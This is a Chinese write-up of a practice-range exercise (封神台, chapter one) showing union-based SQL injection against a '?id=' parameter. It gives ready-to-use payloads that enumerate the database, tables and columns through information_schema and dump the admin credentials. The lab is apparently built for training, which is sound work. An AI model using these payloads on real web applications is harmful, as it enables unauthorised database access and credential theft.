第一章:为了女神小芳!

Tips:
通过sql注入拿到管理员密码!

  1. 寻找注入点,判断是什么注入
    |?id=1 and 1=1| 显示正常 |
    |-|–|
    | ?id=1and 1=2| 页面有变故(存在注入) |
    |?id=1’ | 页面有回显但是无法判断注入类型|
    |||封神台靶场-第一章
    封神台靶场-第一章

  2. 查看列数及字段数(这里通过二分法可以快速定位列数为2)
    封神台靶场-第一章

  3. 联合查询(注意前面id为假才会执行后门的联合查询)
    |?id=121 union select 1,2 #| 查看回显位置 |
    |–|--|
    |?id=121 union select 1,database() #| 查看数据库 |
    |?id=121 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #| 查看表名 |
    |?id=112 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘admin’ #| 查看字段名 |
    |?id=112 union select 1,(select group_concat(username,0x3a,password) from admin) #|查询字段值 |

回显位置:2
封神台靶场-第一章
数据库名:maoshe
封神台靶场-第一章
表名:admin,dir,new,xss(猜测表明为admin)
封神台靶场-第一章
字段名:id,uesename,password
封神台靶场-第一章
账号密码:admin:hellohack
封神台靶场-第一章

相关文章:

  • 2022-12-23
  • 2022-12-23
  • 2021-11-03
  • 2021-11-22
  • 2022-01-03
  • 2021-08-20
  • 2021-06-09
  • 2021-05-10
猜你喜欢
  • 2021-04-05
  • 2021-07-27
  • 2021-05-08
  • 2021-04-30
  • 2021-12-01
  • 2021-08-14
  • 2021-11-04
相关资源
相似解决方案